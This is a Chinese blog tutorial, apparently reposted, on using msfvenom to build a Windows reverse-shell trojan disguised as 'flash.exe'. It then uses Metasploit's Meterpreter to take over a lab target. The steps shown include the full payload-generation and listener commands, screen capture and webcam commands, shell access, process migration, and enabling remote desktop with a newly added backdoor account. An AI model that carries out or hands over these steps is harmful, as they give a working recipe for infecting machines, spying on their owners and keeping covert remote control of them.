metasploit生成木马获取windowns控制权(非免杀版)

转载连接:https://zhuanlan.zhihu.com/p/66785692

写在前面
本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。

准备环境:

入侵机器:kali linux (IP地址:192.168.96.128)
靶机:window server 2003 (IP地址:192.168.96.129)

生成木马

打开kali终端输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 -f exe -o flash.exe
image.png
参数详解:
-p:指定payload
LHOST:指定入侵机器kali linux的IP地址
LPORT:指定监听端口
-f:指定文件类型
-o:指定输出的木马文件名

此时便会在root目录下生成一个名为flash.exe的木马文件

靶机安装木马

把这个exe文件,放到靶机中

msfconsole

打开终端输入msfconsole
使用监听模块:use exploit/multi/handler
设置payload:set payload windows/meterpreter/reverse_tcp
设置攻击机kali linux的地址:set lhost 192.168.96.128 (ip要与生成木马时的ip一致)
设置监听端口:set lport 4444 (端口要与生成木马时的端口一致)
image.png
开始运行:exploit

点击木马

点击flash.exe文件
image.png

回到我们的攻击机kail linux上,发现已经有一个meterpreter会话产生
image.png

控制靶机

1.获取靶机基本信息:sysinfo

image.png
2.获取靶机屏幕截图:screenshot
image.png

捕获到的靶机屏幕截图
3.摄像头

查看靶机有几个摄像头:webcam_list

靶机摄像头视频获取:webcam_stream

由于这里的靶机是windons server 2003,没有摄像头,所以这里无法演示。

4.查看靶机当前目录文件:dir
image.png

由于木马程序的位置是在桌面,所以获取了桌面下的所有文件。

5.在靶机上启动程序:execute
我们这里以启动靶机上的计算器为例

execute -f calc.exe
image.png

回到靶机,计算器已被启动

6.查看靶机的实时屏幕:run vnc
image.png

7.进入靶机的命令行:shell
image.png
这里你可在对方的电脑上执行一些cmd命令

8.查看靶机上正在运行的程序:ps
image.png

你可以用run post/windows/manage/migrate将进程迁移到其他程序,也可以将其他程序关闭

9.进入靶机的远程桌面

第一步,先开启靶机的3389远程桌面:run getgui -e
image.png

第二步,在靶机上新建一个用来登陆远程桌面的用户:run getgui -u kali -p password

这里新建了一个用户名为kali 密码为password的用户
image.png

第三步:登陆靶机的远程桌面

rdesktop -u kali -p password 192.168.96.129:3389
image.png

这个时候就可以像操作自己电脑一样操控靶机

10.恶搞,让靶机主人好好学习

先进入靶机命令行:shell
image.png

发布了67 篇原创文章 · 获赞 36 · 访问量 7万+

猜你喜欢

转载自blog.csdn.net/qq_41861526/article/details/103414745
今日推荐